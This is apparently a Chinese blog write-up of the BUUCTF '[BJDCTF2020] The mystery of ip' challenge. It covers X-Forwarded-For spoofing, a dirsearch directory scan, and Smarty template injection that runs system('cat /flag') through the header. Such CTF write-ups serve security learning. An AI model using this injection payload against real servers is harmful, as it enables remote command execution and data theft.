0
点赞
收藏
分享

微信扫一扫

BUUCTF WEB [BJDCTF2020]The mystery of ip

颜娘娘的碎碎念 2022-04-22 阅读 61
web安全

BUUCTF WEB [BJDCTF2020]The mystery of ip

  • 在hint.php中找到一句注释

    <!-- Do you know why i know your ip? -->

  • 在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头

    X-Forwarded-For: 127.0.0.1

    回显为

    Your IP is : 127.0.0.1

    说明我们获得了可控变量

  • 尝试命令注入失败,到这里就没什么思路了,尝试dirsearch看能不能获得什么信息

    # Dirsearch started Fri Apr 22 02:06:43 2022 as: dirsearch.py -u http://node4.buuoj.cn:28825/

200     6KB  http://node4.buuoj.cn:28825/.DS_Store
301   169B   http://node4.buuoj.cn:28825/css    -> REDIRECTS TO: http://node4.buuoj.cn/css/
200     2KB  http://node4.buuoj.cn:28825/flag.php
200   938B   http://node4.buuoj.cn:28825/header.php
301   169B   http://node4.buuoj.cn:28825/img    -> REDIRECTS TO: http://node4.buuoj.cn/img/
301   169B   http://node4.buuoj.cn:28825/libs    -> REDIRECTS TO: http://node4.buuoj.cn/libs/
301   169B   http://node4.buuoj.cn:28825/templates_c    -> REDIRECTS TO: http://node4.buuoj.cn/templates_c/
403   555B   http://node4.buuoj.cn:28825/templates_c/

    发现一个名为/template_c/ 的文件夹,怀疑存在模板注入

  • 将X-Forwarded-For改为

    X-Forwarded-For: {6*6}

    回显为

    Your IP is : 36

  • 尝试直接读取flag文件

    X-Forwarded-For: {system('cat /flag')}

    回显

    Your IP is : flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b} flag{6a4bda77-d3d8-4117-ab44-b747d76eab0b}
举报

相关推荐

BUUCTF:[BJDCTF2020]EasySearch

BUUCTFBJDCTF2020htmlbcphp代码人生

BUUCTF [BJDCTF2020]认真你就输了 1

矩阵线性代数

BJDctf2020 Ezphp

php开发语言

[BJDCTF2020]----EzPHP

人机交互电脑嵌入式硬件信息与通信经验分享

[BJDCTF2020]EzPHP

phpsmartweb安全

buuctf-The mystery of ip

网络安全

buu-[BJDCTF2020]JustRE

安全

buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)

安全web安全http

[BJDCTF2020]BJD hamburger competition

c#网络安全

[BJDCTF2020]纳尼1

网络安全
0 条评论